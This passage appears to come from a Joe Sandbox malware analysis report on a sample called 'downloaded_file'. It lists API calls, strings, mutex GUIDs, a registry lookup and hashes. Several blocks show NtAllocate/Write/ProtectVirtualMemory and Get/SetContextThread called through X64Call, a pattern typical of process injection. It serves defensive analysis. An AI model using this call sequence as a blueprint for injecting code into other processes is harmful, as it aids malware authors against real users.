                                                                                                            • X64Call.DOWNLOADED_FILE(00000000,00000000,00000005,?,?,?,?,00000000,00000000,?,00000000,?,00000000), ref: 00306644
                                                                                                            • SetLastErrorFromX64Call.DOWNLOADED_FILE(00000000,?), ref: 00306666
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Call$Address64ErrorFromLastProc
                                                                                                            • String ID: NtWriteVirtualMemory
                                                                                                            • API String ID: 3570319994-3834091833
                                                                                                            • Opcode ID: d8e168a2e062b80b3e9a05da7ed9dbd2ac79900ad19070cf05917d6b581f986f
                                                                                                            • Instruction ID: e18856b3039ec413bb9c6b0b30e170901e8d87c19fd037f1d91219d8a9a8182b
                                                                                                            • Opcode Fuzzy Hash: d8e168a2e062b80b3e9a05da7ed9dbd2ac79900ad19070cf05917d6b581f986f
                                                                                                            • Instruction Fuzzy Hash: 64316FB0911209EFDB16CF68DC66BBB77B8AB48304F11812EF80597394E7359A90CF60
                                                                                                            APIs
                                                                                                            • GetProcAddress64.DOWNLOADED_FILE(00000000,?,NtAllocateVirtualMemory), ref: 00306254
                                                                                                            • X64Call.DOWNLOADED_FILE(00000000,00000000,00000006,?,00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000), ref: 003062CE
                                                                                                            • SetLastErrorFromX64Call.DOWNLOADED_FILE(00000000,?), ref: 003062F0
                                                                                                            Strings
                                                                                                            • NtAllocateVirtualMemory, xrefs: 00306248
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Call$Address64ErrorFromLastProc
                                                                                                            • String ID: NtAllocateVirtualMemory
                                                                                                            • API String ID: 3570319994-3765841899
                                                                                                            • Opcode ID: 58528c1385be43ab807cb44e8aad1aee6ec638b477d21d04ea451d6b11102804
                                                                                                            • Instruction ID: 4470acc6d402ced8aad8bdac5a4f6f21b837513fc1d9e8759480708ebf834c9a
                                                                                                            • Opcode Fuzzy Hash: 58528c1385be43ab807cb44e8aad1aee6ec638b477d21d04ea451d6b11102804
                                                                                                            • Instruction Fuzzy Hash: A4212CB4D11208EFEB15CFA4EC56BBB77B9EB88300F109529F40897295E7745A948B90
                                                                                                            APIs
                                                                                                            • GetProcAddress64.DOWNLOADED_FILE(00000000,?,NtProtectVirtualMemory), ref: 00306404
                                                                                                            • X64Call.DOWNLOADED_FILE(00000000,00000000,00000005,?,00000000,?,00000000,?,00000000,?,00000000,?,00000000), ref: 00306475
                                                                                                            • SetLastErrorFromX64Call.DOWNLOADED_FILE(00000000,?), ref: 00306497
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Call$Address64ErrorFromLastProc
                                                                                                            • String ID: NtProtectVirtualMemory
                                                                                                            • API String ID: 3570319994-1546459799
                                                                                                            • Opcode ID: 5acb141a5a08c3eb129c49ffbe26450594579b14ab9578c283776b1145210617
                                                                                                            • Instruction ID: 8860722dfdd5f8d27922455a693c91f9982134c0b70dff73764ebd586ff38a44
                                                                                                            • Opcode Fuzzy Hash: 5acb141a5a08c3eb129c49ffbe26450594579b14ab9578c283776b1145210617
                                                                                                            • Instruction Fuzzy Hash: 7D212AB0D11209AFDF15CF65EC66BBB77F8EB88700F40952DF409A6294D7705990CB64
                                                                                                            APIs
                                                                                                            • GetProcAddress64.DOWNLOADED_FILE(00000000,?,NtFreeVirtualMemory), ref: 00306334
                                                                                                            • X64Call.DOWNLOADED_FILE(00000000,00000000,00000004,?,?,?,00000000,?,00000000,?,00000000), ref: 0030639F
                                                                                                            • SetLastErrorFromX64Call.DOWNLOADED_FILE(00000000,?), ref: 003063C1
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Call$Address64ErrorFromLastProc
                                                                                                            • String ID: NtFreeVirtualMemory
                                                                                                            • API String ID: 3570319994-3923168862
                                                                                                            • Opcode ID: e62443520159deeea680b8794861d4cda0455566e4a412de28b066999c4e1c2b
                                                                                                            • Instruction ID: 7125efb014c3d168728c33fd91eabb82eaa7a9172bc6fdf3efc46aac9bd175d6
                                                                                                            • Opcode Fuzzy Hash: e62443520159deeea680b8794861d4cda0455566e4a412de28b066999c4e1c2b
                                                                                                            • Instruction Fuzzy Hash: C32179B4D10208EFDB16CF64EC62BBA73B9EB88300F00946DF408972A5E2705990CFE0
                                                                                                            APIs
                                                                                                            • GetProcAddress64.DOWNLOADED_FILE(00000000,?,NtQueryVirtualMemory), ref: 00306184
                                                                                                            • X64Call.DOWNLOADED_FILE(00000000,00000000,00000006,00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 003061F1
                                                                                                            • SetLastErrorFromX64Call.DOWNLOADED_FILE(00000000,?), ref: 00306213
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Call$Address64ErrorFromLastProc
                                                                                                            • String ID: NtQueryVirtualMemory
                                                                                                            • API String ID: 3570319994-66515852
                                                                                                            • Opcode ID: d6712164fcf818735b870b53cc19dfd05892f8844bb22de8c10442b0a0211264
                                                                                                            • Instruction ID: 3089e2fc2de1a07681e4c292d694ae54cd3b9155e1293883592a37f10d223977
                                                                                                            • Opcode Fuzzy Hash: d6712164fcf818735b870b53cc19dfd05892f8844bb22de8c10442b0a0211264
                                                                                                            • Instruction Fuzzy Hash: 4C214DB0D14208AFEB25CF98EC56BBB73BCEB84700F00841CF8089A295D7755A90CF61
                                                                                                            APIs
                                                                                                            • GetProcAddress64.DOWNLOADED_FILE(00000000,?,NtGetContextThread), ref: 003066B4
                                                                                                            • X64Call.DOWNLOADED_FILE(00000000,00000000,00000002,?,?,?,00000000), ref: 003066F9
                                                                                                            • SetLastErrorFromX64Call.DOWNLOADED_FILE(00000000,?), ref: 0030671B
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Call$Address64ErrorFromLastProc
                                                                                                            • String ID: NtGetContextThread
                                                                                                            • API String ID: 3570319994-3545450881
                                                                                                            • Opcode ID: deea9cb023e923c3f4f011cc4e15baac777ef6b1c00b961751f3a03193edd141
                                                                                                            • Instruction ID: 56279905d559c97c12e14c6618d5275ff62e698dc35bf642352610dcd389c848
                                                                                                            • Opcode Fuzzy Hash: deea9cb023e923c3f4f011cc4e15baac777ef6b1c00b961751f3a03193edd141
                                                                                                            • Instruction Fuzzy Hash: B11182B4D11208EFEB22DF74EC57B6A77BCA744714F10902EF809962D5E27159E08F20
                                                                                                            APIs
                                                                                                            • GetProcAddress64.DOWNLOADED_FILE(00000000,?,NtSetContextThread), ref: 00306764
                                                                                                            • X64Call.DOWNLOADED_FILE(00000000,00000000,00000002,?,?,?,00000000), ref: 003067A9
                                                                                                            • SetLastErrorFromX64Call.DOWNLOADED_FILE(00000000,?), ref: 003067CB
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Call$Address64ErrorFromLastProc
                                                                                                            • String ID: NtSetContextThread
                                                                                                            • API String ID: 3570319994-3779410840
                                                                                                            • Opcode ID: e157c89b1907c6db99017b4d9e76f192d44e4d367b9e2933e65d89c48e719c39
                                                                                                            • Instruction ID: 339283c9c68abf40f5cd3ae56396cbde1631d4a1a219240cbc8c6e1c8b7d169e
                                                                                                            • Opcode Fuzzy Hash: e157c89b1907c6db99017b4d9e76f192d44e4d367b9e2933e65d89c48e719c39
                                                                                                            • Instruction Fuzzy Hash: DF1182B4911208EFDB22DFB4EC67B6A33FCB744B18F10512CF4088A1C5D37059A4ABA0
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                             • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: _wcscat$FreeLocal__snwprintf
                                                                                                            • String ID: '%s'
                                                                                                            • API String ID: 3523142645-2201965518
                                                                                                            • Opcode ID: 678300493cdce78a8cae450357d30386899df96a4b2b9acca1585e235f4a0d24
                                                                                                            • Instruction ID: 239e8b87684eac01ebe2e47a114330ef14c796ba66cf6c2bf2b9fbfa51991862
                                                                                                            • Opcode Fuzzy Hash: 678300493cdce78a8cae450357d30386899df96a4b2b9acca1585e235f4a0d24
                                                                                                            • Instruction Fuzzy Hash: A7115B7094011CEBDB29DB80CCCABECB779AB64304F208298E0196B195D7749FC4CF90
                                                                                                            APIs
                                                                                                            • __snwprintf.LIBCMT ref: 0030471F
                                                                                                            • RegGetValueW.ADVAPI32(80000001,?,{108D3252-20F0-4C1B-940D-6ED5366D8FD3},00000008,00000000,?,?), ref: 00304750
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                             • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Value__snwprintf
                                                                                                            • String ID: SOFTWARE\%s${108D3252-20F0-4C1B-940D-6ED5366D8FD3}
                                                                                                            • API String ID: 3635966236-2357458413
                                                                                                            • Opcode ID: cc80f95effe6b77020ad761c4b059cbe826ad336f16158d6a27055af0608c005
                                                                                                            • Instruction ID: 40e1d05fc26ec30776c7cc195025623c70c279aa7dff422594473db5f82cebff
                                                                                                            • Opcode Fuzzy Hash: cc80f95effe6b77020ad761c4b059cbe826ad336f16158d6a27055af0608c005
                                                                                                            • Instruction Fuzzy Hash: D5F0AE71A40708BBD721DA95DC46FD67369DB44B01F104195BE0CA61C0F6F09A844BD4
                                                                                                            APIs
                                                                                                            • OpenMutexW.KERNEL32(00100000,00000000,{8FE2C78C-5E69-438F-A4AB-0D2F0B3439E1}), ref: 00310190
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 003101A3
                                                                                                            • Sleep.KERNEL32(00000064), ref: 003101AB
                                                                                                            Strings
                                                                                                            • {8FE2C78C-5E69-438F-A4AB-0D2F0B3439E1}, xrefs: 00310184
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                             • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseHandleMutexOpenSleep
                                                                                                            • String ID: {8FE2C78C-5E69-438F-A4AB-0D2F0B3439E1}
                                                                                                            • API String ID: 2969294566-3746470483
                                                                                                            • Opcode ID: 72d2f13fe5a0fcf391f91158bbd0fefc3c5371d0c1e7d563d09c751604129690
                                                                                                            • Instruction ID: 202d1131effe3c65d8a6f46c43beb345bafc88cde69bd64d3dbbf9a2804f930c
                                                                                                            • Opcode Fuzzy Hash: 72d2f13fe5a0fcf391f91158bbd0fefc3c5371d0c1e7d563d09c751604129690
                                                                                                            • Instruction Fuzzy Hash: B4E0BF74955305EBD73E9BA0CE0DBE97A74AB08745F204139A506751D0CBF98AC0CA62
                                                                                                            APIs
                                                                                                            • OpenMutexW.KERNEL32(00100000,00000000,{8FE2C78C-5E69-438F-A4AB-0D2F0B3439E1}), ref: 00310264
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00310277
                                                                                                            • Sleep.KERNEL32(00000064), ref: 0031027F
                                                                                                            • Sleep.KERNEL32(000003E8), ref: 00310290
                                                                                                            Strings
                                                                                                            • {8FE2C78C-5E69-438F-A4AB-0D2F0B3439E1}, xrefs: 00310258
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                             • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Sleep$CloseHandleMutexOpen
                                                                                                            • String ID: {8FE2C78C-5E69-438F-A4AB-0D2F0B3439E1}
                                                                                                            • API String ID: 2551712853-3746470483
                                                                                                            • Opcode ID: e901395d8e9c985d0fe3a05658b79110f4d21e0ce5f9dda6cb2452c92d2b7000
                                                                                                            • Instruction ID: 9dd0b2af464940125bc343bdf1465e3e55e0ecf4c48b4601d3e6800aa3abd7a6
                                                                                                            • Opcode Fuzzy Hash: e901395d8e9c985d0fe3a05658b79110f4d21e0ce5f9dda6cb2452c92d2b7000
                                                                                                            • Instruction Fuzzy Hash: D9E04630A40300EBE76E9BE0C88CBCD3A79BB0C301F285818F106B11C0C7F884C1CA24
                                                                                                            APIs
                                                                                                            • OpenMutexW.KERNEL32(00100000,00000000,{8FE2C78C-5E69-438F-A4AB-0D2F0B3439E1}), ref: 00310343
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00310356
                                                                                                            • Sleep.KERNEL32(00000064), ref: 0031035E
                                                                                                            • Sleep.KERNEL32(000003E8), ref: 0031036F
                                                                                                            Strings
                                                                                                            • {8FE2C78C-5E69-438F-A4AB-0D2F0B3439E1}, xrefs: 00310337
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                             • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Sleep$CloseHandleMutexOpen
                                                                                                            • String ID: {8FE2C78C-5E69-438F-A4AB-0D2F0B3439E1}
                                                                                                            • API String ID: 2551712853-3746470483
                                                                                                            • Opcode ID: debe8663723fd0464e7444c325019f195c54c64aab54968fb17d15da81f64d62
                                                                                                            • Instruction ID: 488ce4b49c403c302f1a081a70677590ac2c4c534ce70a02ab5feef03b0c1651
                                                                                                            • Opcode Fuzzy Hash: debe8663723fd0464e7444c325019f195c54c64aab54968fb17d15da81f64d62
                                                                                                            • Instruction Fuzzy Hash: 15E0BF34940304EBE76F5B91D95D79D7675BB0C701F108418F522651E0CBF444C4DF01
                                                                                                            APIs
                                                                                                            • OpenMutexW.KERNEL32(00100000,00000000,{8FE2C78C-5E69-438F-A4AB-0D2F0B3439E1}), ref: 003103B0
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 003103C3
                                                                                                            • Sleep.KERNEL32(00000064), ref: 003103CB
                                                                                                            • Sleep.KERNEL32(000003E8), ref: 003103DC
                                                                                                            Strings
                                                                                                            • {8FE2C78C-5E69-438F-A4AB-0D2F0B3439E1}, xrefs: 003103A4
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                             • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Sleep$CloseHandleMutexOpen
                                                                                                            • String ID: {8FE2C78C-5E69-438F-A4AB-0D2F0B3439E1}
                                                                                                            • API String ID: 2551712853-3746470483
                                                                                                            • Opcode ID: 78602f41e20c77d655654187b42cb2894a2dc5610d4afcad4e97ee71c8f02b3f
                                                                                                            • Instruction ID: 5c58317d622c9829d8d7c1a52d95990b588963212fef853a943cbe1082bc9f3f
                                                                                                            • Opcode Fuzzy Hash: 78602f41e20c77d655654187b42cb2894a2dc5610d4afcad4e97ee71c8f02b3f
                                                                                                            • Instruction Fuzzy Hash: AAE0B634A44314DBE72E9BA0CD4DB9E7A79BB08705F148828F552A55D4CBF948C5CB01
                                                                                                            APIs
                                                                                                            • LocalAlloc.KERNEL32(00000040,00009004), ref: 0031CC9D
                                                                                                            • LocalAlloc.KERNEL32(00000040,?), ref: 0031CCB7
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 0031CCEB
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 0031CD02
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 0031CD0C
